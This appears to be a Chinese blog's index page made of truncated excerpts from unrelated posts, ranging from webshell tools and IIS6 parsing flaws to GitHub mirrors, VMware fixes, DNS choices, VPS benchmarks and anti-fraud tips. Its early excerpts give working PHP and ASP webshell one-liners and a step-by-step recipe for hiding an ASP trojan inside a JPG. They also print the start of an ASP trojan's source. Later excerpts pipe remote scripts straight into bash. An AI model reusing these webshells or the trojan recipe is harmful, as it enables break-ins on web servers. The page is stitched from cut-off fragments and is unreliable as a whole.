HQY 一个和谐有爱的空间

0x00 简介蚁剑(AntSword)是一款开源的跨平台WebShell管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。蚁剑推崇模块化的开发思想，遵循开源，就要开得漂亮的原则，致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明，努力让大家可以一起为这个项目贡献出力所能及的点滴，让这款工具真正能让大家用得顺心、舒适，让它能为大家施展出最人性化最适合你的能力！0x01 安装蚁剑分为加载器和核心模块两部分，核心源码可由加载器自动下载源码地址：github

asp图片木马的制作和使用先看代码：仅需几步：图片和一句话木马合并，制作可以正常显示的图片木马。1、找一张图片，名字改成1.jpg 2、<%eval request(“a”)%>存为1.asp（就是一句话木马） 3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件注：以上三个文件放在同一目录里面复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片，运行1.bat，就会出现一个图片asp.jpg

一、解析漏洞需要vulhub环境，调试命令如下：点击查看代码1、IIS6vulhub 里面没有 IIS 的靶场，可以使用罗杰老师提供的03 server r1版本，用户名密码：administrator/123456。解析漏洞介绍1）当建立?.asa、?.asp 格式的文件夹时，其目录下的任意文件都将被 IIS 当做 asp 文件解析。2）当文件?.asp;?.jpg 在IIS6.0下同样会将文件当做 asp 文件解析。步骤新建一个 IIS.ASP 文件点击查看代码把 IIS.ASP 复制一份，

概述在很多的渗透过程中，渗透人员会上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是什么呢?先来看看最简单的一句话木马：代码语言：javascript复制   <?php @eval($_POST['attack']);?>只听到从架构师办公室传来架构君的声音:松叶堪为酒，春来酿几多。有谁来对上联或下联?【基本原理】利用文件上传漏洞，

一个ASP木马程序的源代码 ＜%@ LANGUAGE = VBScript.Encode codepage ="936" %＞＜%Server.ScriptTimeOut=5000%＞＜object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"＞＜/object＞＜object runat=server id=oScr

在ASP.NET中，数据库连接字符串通常存储在Web.config文件中，为了保护这些敏感信息，我们可以使用加密技术对其进行加密，以下是关于如何在ASP.NET中加密数据库连接字符串的详细步骤：旧版本的ASP.NET将连接字符串直接保存在ASPX页面中。回想一下，连接字符串包含了数据服务器名称和用户账户等信息，有时候甚至还包含了密码。在代码中包含以上信息是非常不好的习惯，原因有二。首先，这些信息可以被设计小组中的每一位程序人员看到(但是站点访问者不能在浏览器上看到)。第二，在整个Web站点中的每

如果你所在地区不翻墙的情况下无法打开github.com网站，那么可以通过github镜像网站访问github，或者通过修改电脑本地hosts文件来访问github。一：通过github镜像网站访问githubgithub镜像站点1：https://bgithub.xyzgithub镜像站点2：https://agithub.xyz kkgithub镜像3：https://kkgithub.com/使用方法：比如你在访问GitHub某个页面：https://github.com/Itf

我的電視·〇電視視頻播放軟件，可以自定義視頻源my-tv-0使用遙控器左鍵/觸屏單擊打開視頻列表遙控器右鍵/觸屏雙擊打開配置遙控器返回鍵關閉視頻列表/配置在聚焦視頻標題的時候，右鍵收藏/取消收藏打開配置后，選擇遠程配置，掃描二維碼可以配置視頻源等。也可以直接遠程配置地址 http://0.0.0.0:34567如果視頻源地址已配置，並且打開了“應用啟動后更新視頻源”后，應用啟動后會自動更新視頻源默認遙控器下鍵/觸屏下滑切換到下一個視頻。換台反轉打開後，邏輯相反注意：遇到問題可以先考慮重

https://vmninja.wordpress.com/2019/04/05/remove-inaccessible-datastore-from-inventory/Datastore ‘{name}’ is not accessible. “No connected and accessible host is attached to the datastore.”At a client’s we encountered a rather classical error, a dismo

vCenter删除无效的数据存储 分类: 使用技巧,VMware问题现象vCenter中存在无效的数据存储，无法通过“卸载数据存储”或“删除数据存储”进行移除，需要从数据库进行删除操作步骤1. SSH登录VCSA2. 执行/opt/vmware/vpostgres/current/bin/psql -d VCDB -U postgres进入数据库工具3. 执行\d，列出所有表，确认正常4. 查找无效的数据存储IDSELECT id FROM vpx_entity WHERE

GitHub - nepx/halfix: x86 PC emulator that runs both natively and in the browser, via WebAssembly Halfix is a portable x86 emulator written in C99. It allows you to run legacy operating systems on modern platforms.Why?I made this mostly for fun,

本站自建：https://www.kinber.cn/tools/VirtualXP/VirtualXP.htm 网页版虚拟机:https://lrusso.github.io/VirtualXP/VirtualXP.htm VirtualXP Virtual Machine running on a Web browser. Web https://lrusso.github.io/V

2024选择适合的公共DNS前言2024.6.14 更新， 更新小众DNS服务，增加了一些小厂商的DNS服务。2024.7.3 更新，添加ipv4dns停服说明2024.7.25更新，添加阿里dns免费版接入限速通知由于之前用的公共DNS开始变得不稳定，所以重新找一下目前市面上常见的和可能好用的DNS Server。选择适合的公共 DNS 对于在中国大陆使用互联网是非常重要的，因为它可以影响到你的网络连接速度、安全性和稳定性。主要考虑因素速度和稳定性：选择一个能够提供良好速度

【简单测评】测评脚本汇总作为一个合格的折腾党，vps开机后第一件事当然是测性能和网络，特别是作为分享vps资讯的博主在做vps测评时必用。本文总结前文用到的Linux vps的性能和网络测试脚本以及工具，供大家参考。更新记录2022.9.18 添加docker安装speedtest测速网站2022.9.19 添加superbench.sh一键测试脚本2024.6.15 添加nws.shnws.sh全球测试1wget -qO- nws.sh | bash区域测试1curl -sL nws.sh |

vps【简单测评】  bench.sh 1 wget -qO- bench.sh | bashhttps://bench.sh/ Hi, Welcome to Bench.shYou are able to use this tool to view system information and test the network, disk of your Linux server by using the command as followswget -qO- b

网络备份储存的几种选择因为数据很重要,这其中还有大量的代码片段,笔记,各种资料文档等等。所以，必要的多处异地备份显得重要，这里给出几个我常用的同步存储的选择。2023.7.5更新：近期闲鱼上的硬盘价位较低，400入手了一个4T移动机械硬盘作为备份选择之一。2024.4.5更新：由于近期微软针对E5订阅的消极支持态度，更新备份策略及网盘的推荐。目前备份策略为Bitiful+家庭版Office365提供的1T的Onedrive。前言由于数据安全性和完整性必须得到保证,如果选用本地加密后上传,取回数据

你应该知道的网络防骗小知识鉴于韭菜还是太多了，总结一些常见的网络诈骗及窃取隐私的套路。1.网站1.1钓鱼网站此类网站大多假冒知名网站或需要输入敏感信息的网页，比如假冒缴费/银行以诱导输入账号密码/银行卡/密码等关键信息达到盗取钱财的目的。大约一半的钓鱼网站的域名较为杂乱以个人的经验判断，如果浏览器提示不安全，那么有80%的概率此网站为假冒网站。1.2第三方软件下载站此类网站专坑不去官网下载软件的懒人及小白用户。下载的软件中包含恶意程序，可能盗取你的浏览器中保存的账号密码/劫持你的浏览器首页作为其

酷狗音乐解析这里还是起了一点波折酷狗音乐是通过hash来获取音乐的，刚开始我并没有去直接抓包，而是通过百度去看看前辈没抓下来的接口http://m.kugou.com/app/i/getSongInfo.php?cmd=playInfo&hash=A12B8551334EEA1EA8E2A53A89741675刚开始确实是通过这个抓到了音乐的真实地址json格式化一下可以看到我们确实获取到了之后我使用php的curl函数去模拟请求获取返回json数据出了问题之后就是无论请求多少次都是这样

一、问题现象GitHub页面时而能访问，时而不能。不是慢，而是不能访问。当然，下载它的比如仓库Release下的压缩包比较慢则是另一回事。蛋疼的影响不限于打不开页面，更多的在于不能git pull和git push等操作。范围方面，凡国内不管是家宽、移动网络还是云上的，都受到一致的影响。二、问题原因1、DNS解析污染网上有个这个说法，大致原理就是“某某”通过拦截你发起的GitHub域名解析请求并伪装返回非正确的IP地址。但我有些怀疑，打不开GitHub也没见什么其他页面显示出来，怀疑这个“某某”